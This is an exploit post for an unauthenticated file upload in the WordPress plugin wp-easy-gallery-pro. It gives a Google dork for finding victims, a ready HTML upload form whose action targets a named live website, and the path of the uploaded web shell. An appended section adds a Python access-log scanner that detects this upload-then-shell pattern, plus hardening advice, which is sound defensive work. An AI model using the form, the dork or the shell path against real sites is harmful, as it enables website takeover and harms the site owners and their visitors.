Assalamu'alaikum Wr. Wb. (peace be upon you)
- #$idoarjo Getar | Stay calm and Hide our Skills
- #Author: aAn
- #Dork: inurl:"wp-easy-gallery-pro"
- #Type: CSRF & XAMPP, Uploadify
- #Tested:-
- #CMS:WordPress
Vulnerable file and exploit path: /wp-content/plugins/wp-easy-gallery/admin/php.php
CSRF:
<form enctype="multipart/form-data"
action="http://bushwickcenter.net/wp-content/plugins/wp-easy-gallery-pro/admin/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell location: /wp-content/uploads/jiwa.php
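Added detection example, not part of the original advisory: a small Python script that scans web-server access log lines for the two traces this bug leaves behind, a POST to the plugin's admin/php.php upload handler and a request for a PHP file under wp-content/uploads, then lists client IPs that produced both. The combined log format and the sample entries are assumptions constructed for the example.

```python
import re
from collections import defaultdict, namedtuple

# Matches the common "combined" web-server log format (assumed here).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Upload handler named in the advisory (free and -pro plugin directories).
UPLOADER_RE = re.compile(r"/wp-content/plugins/wp-easy-gallery(-pro)?/admin/php\.php$")
# Any PHP script served from the uploads tree: uploads should never execute code.
UPLOADS_PHP_RE = re.compile(r"^/wp-content/uploads/.*\.ph(p\d?|tml)$", re.IGNORECASE)

Finding = namedtuple("Finding", "ip ts kind path")

def scan_log(lines):
    """Return one Finding per suspicious request, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m.group("path").split("?", 1)[0]  # drop the query string
        if m.group("method") == "POST" and UPLOADER_RE.search(path):
            findings.append(Finding(m.group("ip"), m.group("ts"), "uploader_post", path))
        elif UPLOADS_PHP_RE.match(path):
            findings.append(Finding(m.group("ip"), m.group("ts"), "php_in_uploads", path))
    return findings

def likely_webshell_drops(findings):
    """IPs that both POSTed to the uploader and requested a PHP file under uploads."""
    seen = defaultdict(set)
    for f in findings:
        seen[f.ip].add(f.kind)
    wanted = {"uploader_post", "php_in_uploads"}
    return sorted(ip for ip, kinds in seen.items() if wanted <= kinds)

# Constructed sample log, not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-login.php HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "POST /wp-content/plugins/wp-easy-gallery-pro/admin/php.php HTTP/1.1" 200 57
203.0.113.5 - - [10/Oct/2023:13:55:45 +0000] "GET /wp-content/uploads/jiwa.php HTTP/1.1" 200 2048
198.51.100.7 - - [10/Oct/2023:14:01:02 +0000] "GET /wp-content/uploads/2023/10/photo.jpg HTTP/1.1" 200 90211
""".splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
    print("likely web shell drops from:", likely_webshell_drops(scan_log(SAMPLE_LOG)))
```

Blocking PHP execution under wp-content/uploads at the web server and requiring authentication plus an extension allowlist in the upload handler removes both traces at the source.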